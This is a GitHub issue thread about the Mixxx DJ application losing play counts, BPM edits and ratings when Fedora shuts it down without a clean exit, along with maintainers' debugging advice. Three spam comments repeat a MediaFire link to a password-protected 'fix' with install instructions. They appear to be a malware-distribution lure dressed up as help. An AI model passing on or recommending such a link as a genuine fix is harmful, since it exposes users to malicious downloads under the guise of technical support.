### ISSUE TITLE
Information is lost if Mixx is not properly closed

### ISSUE THREAD

**Issue by osoitz** [mixxxdj/mixxx#13616]
### Bug Description

If I don't close Mixx properly, for example, when I reboot the computer while Mixxx is open, information is not saved, like:
- Play count
- Manual changes to song BPM
- Manual changes to song rating

If Mixxx is closed using the top right close button, even  while Mixx is playing, information seems to be saved correctly

### Version

2.4 Flatpak

### OS

Fedora KDE 40

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by ronso0** [comment]
Yes, if you kill an application, this can cause loss of information.
I don't what your Fedora does, how long it waits for apps to shutdown gracefully.

**Comment by osoitz** [comment]
Fedora is not killing Mixxx straight away.
When I reboot, the dialog "A deck is playing. Exit Mixxx? Yes/No" shows up, and it waits for my answer. If I say "No" the computer is not reboot.

**Comment by osoitz** [comment]
Updated description, information loss does not depend on rebooting

**Comment by ronso0** [comment]
> information might not be updated also when closing Mixxx with the top right button

That can happen when Mixxx doesn't close properly, ie. crashes during shutdown for some reason.
When you notice that info you added/changed in the previous session hasn't been stored correctly, you may take a look at the log of that previous session. maybe that contains a clue.
Logs are rotated, so the previous log is `mixxx.log.1`.

**Comment by daschuer** [comment]
You may also run Mixxx with gdb: 
https://github.com/mixxxdj/mixxx/wiki/Creating-Backtraces#linux--mac-os-x-with-xcode-4x

**Comment by osoitz** [comment]
Update

1) I could not reproduce Mixxx losing information when it's closed with the top right button, so maybe I got confused, removed that.

2) The difference I see in the logs is that when Mixxx is closed with the button, it prints several lines to the log after the button is clicked, mentioning that it disconnects from the database, but when it's closed by the system (for example on logout) it prints nothing

3) It seems a Fedora thing. It also happens in Fedora Workstation 40 (Gnome), but it does not happen in KDE Neon, or EndeavourOS

**Comment by Swiftb0y** [comment]
That implies that mixxx is indeed just killed on the spot, giving it no chance to save any pending changes to the database. I'm not sure how much we can realistically do about this.
